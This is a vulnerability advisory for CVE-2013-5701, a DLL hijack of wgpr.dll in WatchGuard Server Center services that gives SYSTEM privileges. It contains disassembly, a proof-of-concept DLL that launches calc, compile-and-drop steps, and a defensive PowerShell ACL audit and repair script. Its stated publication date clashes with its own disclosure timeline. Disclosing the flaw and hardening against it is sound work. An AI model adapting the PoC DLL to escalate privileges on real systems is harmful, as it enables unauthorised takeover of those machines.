ADVISORY INFORMATION

  • Product: Watchguard Server Center
  • Vendor URL: https://www.watchguard.com
  • Type: Uncontrolled Search Path Element [CWE-427]
  • Date found: 2013-07-29
  • Date published: 2013-08-09
  • CVSSv2 Score: 6.6 (AV:L/AC:M/Au:S/C:C/I:C/A:C)
  • CVE: CVE-2013-5701

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

  • Watchguard Server Center v11.7.4
  • Watchguard Server Center v11.7.3
  • Other, older versions may be affected too

VULNERABILITY DETAILS

An insecure library loading vulnerability has been identified in two service components of the Watchguard Server Center v11.7.4.

The application installs two services “Watchguard Log Collector” (%installdir%\wsm11\wlcollector\bin\wlcollector.exe) and “Watchguard WebBlocker Server” (%installdir%\wsm11\wbserver\bin\wbserver.exe).

Both services load a library by its bare file name rather than by an absolute path (see DEBUG INFORMATION below), so Windows resolves it through the default DLL search order, starting with the directory the service executable was started from. That search path includes directories that may be untrusted or under user control.

By placing a custom version of the library in the application directory, an attacker gets it loaded in place of the legitimate version. This allows the attacker to inject code that runs with the privileges of the program or of the user executing it. The following library can be hijacked in this way:

wgpr.dll

Since both services run under the SYSTEM account, this may allow a less privileged user to gain SYSTEM privileges: a local attacker or a compromised process places a malicious library in the service's directory, and it is loaded and executed the next time the service (re)starts.

On a default installation (%programfiles%\Watchguard) of the Watchguard Server Center on Windows Vista and above, the directory permissions prevent a low-privileged attacker from mounting the attack.

On a default installation (%programfiles%\Watchguard) of the Watchguard Server Center on Windows XP, the attacker needs at least Power User rights to mount the attack successfully.

On a non-default installation of the Watchguard Server Center into a directory that is writable by a low-privileged user, the attack can be mounted without any restrictions.

DEBUG INFORMATION

The vulnerable code part of wlcollector.exe:

00401691  MOV EDI,DWORD PTR DS:[<&KERNEL32.LoadLib>; kernel32.LoadLibraryA
00401697  MOV ESI,EAX
00401699  TEST ESI,ESI
0040169B  JE SHORT wlcollec.004016B3
0040169D  PUSH wlcollec.00409320              ; /ProcNameOrOrdinal
004016A2  PUSH wlcollec.00409310              ; |/FileName = "kernel32.dll"
004016A7  CALL EDI                            ; |\LoadLibraryA
004016A9  PUSH EAX                            ; |hModule
004016AA  CALL EBX                            ; \GetProcAddress
004016AC  TEST EAX,EAX
004016AE  JE SHORT wlcollec.004016B3
004016B0  PUSH ESI
004016B1  CALL EAX
004016B3  PUSH wlcollec.00409304              ;  ASCII "wgpr.dll"
004016B8  CALL EDI                            ;  kernel32.LoadLibraryA

The vulnerable code part of wbserver.exe:

00401041  MOV EDI,DWORD PTR DS:[<&KERNEL32.LoadLib>; kernel32.LoadLibraryA
00401047  MOV ESI,EAX
00401049  TEST ESI,ESI
0040104B  JE SHORT wbserver.00401063
0040104D  PUSH wbserver.00408284              ; /ProcNameOrOrdinal
00401052  PUSH wbserver.00408274              ; |/FileName = "kernel32.dll"
00401057  CALL EDI                            ; |\LoadLibraryA
00401059  PUSH EAX                            ; |hModule
0040105A  CALL EBX                            ; \GetProcAddress
0040105C  TEST EAX,EAX
0040105E  JE SHORT wbserver.00401063
00401060  PUSH ESI
00401061  CALL EAX
00401063  PUSH wbserver.00408268              ;  ASCII "wgpr.dll"
00401068  CALL EDI                            ;  kernel32.LoadLibraryA

PROOF OF CONCEPT

Compile the following code into wgpr.dll and place it in the bin directory of one of the affected services to exploit the vulnerability:

// Build as a DLL named wgpr.dll (e.g. with MinGW: gcc -shared -o wgpr.dll wgpr.c)
// and drop it into the service's bin directory; it is picked up on the next
// service start.
#include <windows.h>

#define DLL_EXPORT __declspec(dllexport)

#ifdef __cplusplus
extern "C" {
#endif

// Payload: runs with the privileges of the loading service once this export
// is called.
void DLL_EXPORT wgpr_library_get() {
    WinExec("calc", 0);
}

#ifdef __cplusplus
}
#endif

SOLUTION

Administrators who installed the Watchguard Server Center on Windows XP or outside the default installation folder should harden the directory permissions on the mentioned folders (write access for administrators only) to lower the risk until a fixed version is available.
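The following PowerShell script is an added example for this advisory, not code from RCE Security or WatchGuard. It checks the two service directories named above for Allow ACEs that give low-privileged principals write access (the precondition for the hijack described in VULNERABILITY DETAILS) and, when run elevated with -Fix, replaces the directory DACL as recommended here. The install root defaulting to %ProgramFiles%\Watchguard, the list of "low-privileged" well-known SIDs, and the Administrators/SYSTEM/Users split in the repaired ACL are assumptions of this example; adjust them to your deployment.

```powershell
# Added example, not part of the original advisory. Audits (and with -Fix
# repairs) the DACLs of the two WatchGuard service directories.
# Assumptions: install root under %ProgramFiles%, and the two bin\ paths
# named in the advisory are the directories to protect.
param(
    [string]$InstallDir = (Join-Path $env:ProgramFiles 'Watchguard'),
    [switch]$Fix
)

# Application directories searched first when wlcollector.exe / wbserver.exe
# call LoadLibraryA("wgpr.dll") with a bare file name.
$ServiceDirs = @(
    (Join-Path $InstallDir 'wsm11\wlcollector\bin'),
    (Join-Path $InstallDir 'wsm11\wbserver\bin')
)

# Any of these rights lets a principal drop, replace or delete a file here.
$R = [System.Security.AccessControl.FileSystemRights]
$WriteRights = $R::CreateFiles -bor $R::AppendData -bor $R::Delete -bor
               $R::DeleteSubdirectoriesAndFiles -bor $R::Write -bor
               $R::Modify -bor $R::FullControl

# Well-known SIDs that stand for "any local user" (assumed list); Power Users
# covers the Windows XP case described in the advisory.
$LowPrivSids = @(
    'S-1-1-0',       # Everyone
    'S-1-5-11',      # Authenticated Users
    'S-1-5-4',       # INTERACTIVE
    'S-1-5-32-545',  # BUILTIN\Users
    'S-1-5-32-547'   # BUILTIN\Power Users
)

function ConvertTo-Sid([System.Security.Principal.IdentityReference]$Id) {
    if ($Id -is [System.Security.Principal.SecurityIdentifier]) { return $Id.Value }
    try { return $Id.Translate([System.Security.Principal.SecurityIdentifier]).Value }
    catch { return $null }   # unresolvable account: treat as not low-privileged
}

function Get-WeakDirectoryAces([string]$Path) {
    # Allow ACEs on $Path that grant a low-privileged principal write rights.
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return @() }
    (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        (([int]$_.FileSystemRights -band [int]$WriteRights) -ne 0) -and
        ($LowPrivSids -contains (ConvertTo-Sid $_.IdentityReference))
    }
}

function Repair-DirectoryAcl([string]$Path) {
    # Cut inheritance from a possibly permissive %installdir% and replace the
    # grants: Administrators (S-1-5-32-544) and SYSTEM (S-1-5-18) get full
    # control, Users (S-1-5-32-545) read and execute only.
    & icacls.exe $Path /inheritance:r /grant:r `
        '*S-1-5-32-544:(OI)(CI)F' '*S-1-5-18:(OI)(CI)F' '*S-1-5-32-545:(OI)(CI)RX' | Out-Null
    return ($LASTEXITCODE -eq 0)
}

foreach ($dir in $ServiceDirs) {
    $weak = @(Get-WeakDirectoryAces $dir)
    if ($weak.Count -eq 0) {
        "OK     $dir"
        continue
    }
    foreach ($ace in $weak) {
        "WEAK   $dir : $($ace.IdentityReference) has $($ace.FileSystemRights)"
    }
    if ($Fix) {
        if (Repair-DirectoryAcl $dir) { "FIXED  $dir" } else { "FAILED $dir (run elevated)" }
    }
}
```

Run it once without -Fix to see which directory and which ACE is the problem, then again from an elevated prompt with -Fix. Because the repair cuts inheritance, a later loosening of %installdir% itself cannot reintroduce write access to the bin directories; files already inside pick up the new inheritable ACEs. The check looks only at directory ACLs, which is what the advisory's attack needs; it does not examine the services' binaries or any existing wgpr.dll.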

REPORT TIMELINE

  • 2013-07-29: Discovery of the vulnerability
  • 2013-07-30: RCE Security sends first notification to Customer Care via mail, with disclosure date set to 13 August 2013
  • 2013-08-05: RCE Security sends second notification using Twitter
  • 2013-08-05: Response from vendor
  • 2013-08-05: RCE Security sends vulnerability details to vendor
  • 2013-08-05: Vendor ACKs the issue and asks for an extension of 30 days
  • 2013-08-06: New disclosure date set to 13 September 2013
  • 2013-08-06: Vendor assigns bug id #75251
  • 2013-08-19: No further status updates received; RCE Security asks for a status update according to its disclosure policy
  • 2013-08-19: Vendor estimates the risk of the issue as “extremely limited” and therefore ACKs the public disclosure
  • 2013-08-28: Vendor plans to release the fix with the next major release around Q4
  • 2013-09-05: MITRE assigns CVE-2013-5701 for this issue
  • 2013-09-08: Full Disclosure

REFERENCES